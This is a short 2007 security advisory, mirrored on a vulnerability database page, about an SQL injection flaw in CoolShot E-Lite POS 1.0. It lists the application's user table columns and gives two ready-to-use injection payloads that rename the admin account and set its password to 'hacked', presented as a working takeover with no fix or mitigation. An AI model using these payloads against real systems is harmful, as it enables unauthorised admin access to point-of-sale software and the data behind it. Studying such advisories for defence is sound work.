Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormThe-0utl4wPACKETSTORM:61213
HistoryNov 27, 2007 - 12:00 a.m.

coolshot-sql.txt

2007-11-2700:00:00
The-0utl4w
packetstormsecurity.com
14
JSON
`Aria-Security Team  
http://aria-security.net  
-------------------------------------  
CoolShot E-Lite POS 1.0  
http://coolshot.net/index.php/works/49-e-lite-pos  
  
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1108#post1108  
Published on November 24 2007  
  
users.user_id  
users.user_name  
users.user_email  
users.user_admin  
users.user_auth  
users.user_pw  
  
  
use these two queries  
-1' UPDATE users set user_name= 'admin' Where(user_iD= '1');--  
-1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');--  
  
there you go with the user admin and password hacked.  
  
Credits Goes to Aria-Security Team  
A SPECIAL THANKS TO: AurA  
Regards,  
The-0utl4w  
`
JSON